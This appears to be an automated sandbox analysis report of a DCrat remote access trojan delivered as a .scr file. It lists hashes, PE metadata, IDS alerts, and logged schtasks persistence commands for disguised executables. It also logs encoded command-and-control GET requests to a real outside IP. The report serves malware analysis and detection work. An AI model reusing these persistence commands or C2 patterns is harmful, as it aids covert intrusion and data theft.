File name: | ©.scr |
Full analysis: | https://app.any.run/tasks/584251d2-3f2f-49d1-99ba-b6ebd05d4df1 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT) first introduced in 2018. It is modular malware that can be customized to perform different tasks: for instance, it can steal passwords and crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | May 21, 2022, 11:12:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | 141263663E5FCAEC2875AC2D6A190F7E |
SHA1: | D1001D757FC95CDEF339BF1E9311D934C7BC7A7C |
SHA256: | 1343E32C154A304C9733585CD4D67912EBCC13E50F1CA761C65E626F790179B6 |
SSDEEP: | 24576:P2G/nvxW3W7WJ6S0kc4I62wSmw1uK91MC5D5mR1FSGxui9jXM2QHcaM:PbA3r6zR4I6BMT66iReU |
.exe | Win32 Executable (generic) (52.9) |
.exe | Generic Win/DOS Executable (23.5) |
.exe | DOS Executable Generic (23.5) |
Subsystem: | Windows GUI |
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1ec40 |
UninitializedDataSize: | - |
InitializedDataSize: | 143360 |
CodeSize: | 201216 |
LinkerVersion: | 14 |
PEType: | PE32 |
TimeStamp: | 2020:12:01 19:00:55+01:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Dec-2020 18:00:55 |
Detected languages: | |
Debug artifacts: | |
Magic number: | MZ |
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000118 |
Signature: | PE |
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 6 |
Time date stamp: | 01-Dec-2020 18:00:55 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000310EA | 0x00031200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.70808 |
.rdata | 0x00033000 | 0x0000A612 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.22174 |
.data | 0x0003E000 | 0x00023728 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.70882 |
.didat | 0x00062000 | 0x00000188 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.29825 |
.rsrc | 0x00063000 | 0x00015168 | 0x00015200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.67308 |
.reloc | 0x00079000 | 0x00002268 | 0x00002400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.55486 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.26192 | 1875 | Latin 1 / Western European | English - United States | RT_MANIFEST |
7 | 3.1586 | 482 | Latin 1 / Western European | English - United States | RT_STRING |
8 | 3.11685 | 460 | Latin 1 / Western European | English - United States | RT_STRING |
9 | 3.11236 | 440 | Latin 1 / Western European | English - United States | RT_STRING |
10 | 2.99727 | 326 | Latin 1 / Western European | English - United States | RT_STRING |
11 | 3.2036 | 1094 | Latin 1 / Western European | English - United States | RT_STRING |
12 | 3.12889 | 358 | Latin 1 / Western European | English - United States | RT_STRING |
13 | 3.01704 | 338 | Latin 1 / Western European | English - United States | RT_STRING |
14 | 2.94627 | 266 | Latin 1 / Western European | English - United States | RT_STRING |
15 | 2.83619 | 188 | Latin 1 / Western European | English - United States | RT_STRING |
KERNEL32.dll
USER32.dll (delay-loaded)
gdiplus.dll
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2876 | "C:\Users\admin\AppData\Local\Temp\ ©.scr.exe" | C:\Users\admin\AppData\Local\Temp\ ©.scr.exe | — | Explorer.EXE | User: admin; Integrity Level: MEDIUM; Exit code: 3221226540 |
3548 | "C:\Users\admin\AppData\Local\Temp\ ©.scr.exe" | C:\Users\admin\AppData\Local\Temp\ ©.scr.exe | | Explorer.EXE | User: admin; Integrity Level: HIGH; Exit code: 0 |
1820 | "C:\Windows\System32\WScript.exe" "C:\agentmonitorNet\we8WzpRKqSagh80pvHC.vbe" | C:\Windows\System32\WScript.exe | — | ©.scr.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
1980 | C:\Windows\system32\cmd.exe /c ""C:\agentmonitorNet\8Y8Ym276q9Dc2L.bat" " | C:\Windows\system32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
116 | "C:\agentmonitorNet\componentCommonsvc.exe" | C:\agentmonitorNet\componentCommonsvc.exe | | cmd.exe | User: admin; Integrity Level: HIGH; Exit code: 0; Version: 5.15.2.0 |
3516 | schtasks.exe /create /tn "IMEDICTUPDATEI" /sc MINUTE /mo 8 /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\IMEDICTUPDATE.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3572 | schtasks.exe /create /tn "IMEDICTUPDATE" /sc ONLOGON /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\IMEDICTUPDATE.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
996 | schtasks.exe /create /tn "IMEDICTUPDATEI" /sc MINUTE /mo 13 /tr "'C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\IMEDICTUPDATE.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1856 | schtasks.exe /create /tn "SearchIndexerS" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\SearchIndexer.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3840 | schtasks.exe /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\MSOCache\All Users\SearchIndexer.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Key | Name | Operation | Value |
---|---|---|---|---|---|
3548 | ©.scr.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
3548 | ©.scr.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
3548 | ©.scr.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
3548 | ©.scr.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
1820 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
1820 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | write | 1 |
1820 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | write | 1 |
1820 | WScript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | write | 0 |
116 | componentCommonsvc.exe | HKEY_CURRENT_USER\Software\019ad28cc50225c7034d0632f200efdf05ba8c3c | 5e504606725a76a282d262131ee02c5617f404d2 | write | … |
116 | componentCommonsvc.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | write | 1 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3548 | ©.scr.exe | C:\agentmonitorNet\we8WzpRKqSagh80pvHC.vbe | vbe | 13A2309AF4284B0E1A3B7D44741C981F | A058199089403027B8FD46FE7ABEB2DBEBBD61C69F97548E194A087D88599F2D |
116 | componentCommonsvc.exe | C:\agentmonitorNet\26c12092da979c | text | 349BA698D1FFD4341FD7FE4DEB996421 | BA87E1C5DCBAA91814984C359DA64459E5FFC7591499A730BDF7BAC57EB7F5BF |
116 | componentCommonsvc.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\088424020bedd6 | text | 8DF4E1F5DDAFD3288A79139E3ACDCF76 | 0C563FA3FDCA87F2FCCA36C5D6638F404D0F5468FE56726FB1BAA29EC9FEAFB8 |
116 | componentCommonsvc.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\1173b9a28a9c10 | text | 3639F8AED4AC5E8B8E8A86B761FB2BFF | D24D6200DB7794E4D76C1C00C7D2DF2FDA0D843026775DD7CB6249D1D762AAF8 |
116 | componentCommonsvc.exe | C:\MSOCache\All Users\4a1145983886ca | text | 1233A4586428175107DA098DCEA5691C | 87FB064362CF2BF3D110F5129DAE77BE99CC6E7EC2FC174D48BBAE8F3154837E |
116 | componentCommonsvc.exe | C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\96094160f8fe35 | text | 89A09B1DC1A506725545028D9DB0E4AC | 76841C6B2581AA94A14C492EAFC8CBF5B15E671FFAA828EF045DAAD53EEBB4B6 |
116 | componentCommonsvc.exe | C:\agentmonitorNet\101b941d020240 | text | ACD4E6C207494EB928C96E42ECABF3BC | C8CAF8620C0FB86256E47D638A512AC28B2B424F0705EB4C871C76D1C874CD95 |
116 | componentCommonsvc.exe | C:\ProgramData\Microsoft Help\1173b9a28a9c10 | text | 93E885E485821F75967882BB1A7CE1F6 | CC6527D873679FDF81D5750E2C06AF4FA8DD30D77CBF185A0558C6B1D49573B4 |
116 | componentCommonsvc.exe | C:\Program Files\Microsoft Office\69ddcba757bf72 | text | BBA7D419C5AB36604BCB8A78A5C3CB27 | 2C5B6CC68A46B421547A42E624C4F7D9B77D2F2FAA7C69909CB0EB84347A6281 |
3548 | ©.scr.exe | C:\agentmonitorNet\8Y8Ym276q9Dc2L.bat | text | 7DD2DF583C729B5F3456C7821E7A2507 | 28FA1E82EED4A6816E8C22FED7960AAF8499F63AEC316E284372D05E1F42501F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3140 | conhost.exe | GET | — | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&f8f468f6b5e3d07b4b439ed6bd7354cb=d1nIkJDMzkjY1EDZ3YjZ1YWZ1MDM2IWMzEjN0IjMjNmZhVDNlZDZ5EWN5IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | — | — | malicious |
3140 | conhost.exe | GET | — | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&f8f468f6b5e3d07b4b439ed6bd7354cb=d1nIxYTMmNmZzMzYwgDM1ATNxQGN0ITZlBjYiZWN5cDNiFWMmFzMmFDZ4IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | — | — | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?zgE5oxkNwR1wZVKWadGLSzvjw4=Iye6c9M9FzJCMOuNQckhW&cl3Icg9ufJtJbZRVZwN=FgQa46hmfGLW&ff33772bece92c06819dfa51fb6fca58=9dc8cec482ad0776090c89cbfeb891e9&9d297edcb1b15d681ee257979b496eae=QMjZTYmRzMyEjYxgzNkdTZ3gjZjlTNiV2YlZmMmdjNxUDNzEWMhljY&zgE5oxkNwR1wZVKWadGLSzvjw4=Iye6c9M9FzJCMOuNQckhW&cl3Icg9ufJtJbZRVZwN=FgQa46hmfGLW | RU | text | 2.09 Kb | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&8851c6d4460ca6de87f4d19182d5eacf=0VfiIiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiIkJDMzkjY1EDZ3YjZ1YWZ1MDM2IWMzEjN0IjMjNmZhVDNlZDZ5EWN5IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&5b30b517a3f8a753c628155092037b5f=… | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&5b30b517a3f8a753c628155092037b5f=QX9JCNr9EMWdkYzZkMWdGOHR2ds52YEJUejhGarNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiI3ImZkJ2YkNTO1MmZ3kjZ4YTNyATOkZGMzMDM0Q2Y5Q2YkJWMldjNyIiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&f8f468f6b5e3d07b4b439ed6bd7354cb=d1nIhJWMiZDMjNzY4cTMllDNilTNwMmZhdDNwIGZ5czN4IjZ0YDNyI2Y0IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W&8851c6d4460ca6de87f4d19182d5eacf=… | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&5b30b517a3f8a753c628155092037b5f=d1nILBTQNJiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiIkJDMzkjY1EDZ3YjZ1YWZ1MDM2IWMzEjN0IjMjNmZhVDNlZDZ5EWN5IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&f8f468f6b5e3d07b4b439ed6bd7354cb=d1nIhJWMiZDMjNzY4cTMllDNilTNwMmZhdDNwIGZ5czN4IjZ0YDNyI2Y0IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W&8851c6d4460ca6de87f4d19182d5eacf=QX9JiI6ISYmNzY4ITZ1QDM3MGNwMjMwUTZyIWY2MDN2EmM1ETOhJCLiEmYxImNwM2MjhzNxUWO0IWO1AzYmF2N0AjYklzN3gjMmRjN0IjYjRjI6IiMjZDO5UjN3MTOxQjMxIWY0QWYkFjNwUWZ4ITN3MDNyICLiEzM5MWYiVjNyMmMkV2N1EjNxYjNhVGM1YzM2UDNkFGO4gDM3Y2YmVjI6IyYxM2N2UGO1YWMiljY3gDOwgjYkF2Y3QTZ2YDNmVWNlJyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2a510Zj1mYwJESjxmUzU1ZRR1Tnd3VatWOXR1ZZRUS1g3VhRnRtJ1ZRpmT0g2QJZDawI1djpGT5F0QRdWVGVFRCNUT3FlaORXVUF2ZrNFVVh2UalXOyE1ZrlWVvd3VaBTNXNVavpWSsFzVZ9kVGVFRKNETpt2URZHNFt0ZJhlWwIEWZtmRFlkeOdVYvJEWZlHZFlkQktmVnFVbjhmUtJGaSNTVp9maJxWMXl1TWZUVIp0QMl2aslkNJlmYwFzRaJkTYFWa3lWS4lUaPl2YVFVVKNETpFFWhNkQp1keBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWa0IjYrVjMi1UOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUawIjYrRWbiBHdFl0aWdEZwVzVWdGMDl0aWdVYtxmMZxmQzM2ZRNjYPpUaPl2YtNmdKNETp1EVPdHND1Ed3NkTyUEVOVXRU5UavpWSqlzRil2dpl0QktWS2k0UllnUuJWM5ITWpdXaJtWNXl1ck1mYGpUaPlGNyIGckdlW5p0QMlGNyI2a1IjYNpUaPl2aIRGcO1WSzl0QNRTRqxUMNRVT1lEVNlHND9ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiImFDMzIWN5kzN5I2M3UDZxMjNmVGZ1MzM1MT
MldjYygTN1IGMmNTYmJiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
3140 | conhost.exe | GET | 200 | 62.113.96.135:80 | http://62.113.96.135/HttpMultidefaultBaseWindows.php?MITzSK2=W2iEhiUoFp07GfIe0SliaZKwQf&FARzT3K=V3mgUrnAzl4Fq9z89iUX6rvyBXP&b6a8a9cef5a1af20120f04f3fe493058=QOyUWNwIDZ3MmMjNzMkFjYxI2MlVTZlZmYzEWO2UmMkljYwcjNzYDNzcDM2UDOxMDNzITMwcTM&9d297edcb1b15d681ee257979b496eae=AO5kTZhVWM0kTOlVmYkZTOhdzNlVWY4EDO0EDM5EmZ5YGNyAjMmZGN&8851c6d4460ca6de87f4d19182d5eacf=0VfiIiOiEmZzMGOyUWN0AzNjRDMzIDM1UmMiFmNzQjNhJTNxkTYiwiIjJzYyU2N2ITMwATZ4kjN3ATMzAzY0EmN1EjNhRjYyMTNwQWZ2ADO3IiOiIzY2gTO1YzNzkTM0ITMiFGNkFGZxYDMlVGOyUzNzQjMiwiIxMTOjFmY1YjMjJDZldTNxYTM2YTYlBTN2MjN1QDZhhDO4AzNmNmZ1IiOiMWMjdjNlhTNmFjY5I2N4gDM4IGZhN2N0UmN2QjZlVTZis3W | RU | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3140 | conhost.exe | 62.113.96.135:80 | — | Zenon N.S.P. | RU | malicious |
— | — | 192.168.100.2:53 | — | — | — | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.microsoft.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3140 | conhost.exe | A Network Trojan was detected | ET TROJAN DCRAT Activity (GET) |
3140 | conhost.exe | A Network Trojan was detected | ET INFO Observed Malicious Filename in Outbound POST Request (Information.txt) |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |
3140 | conhost.exe | Generic Protocol Command Decode | SURICATA HTTP unable to match response to request |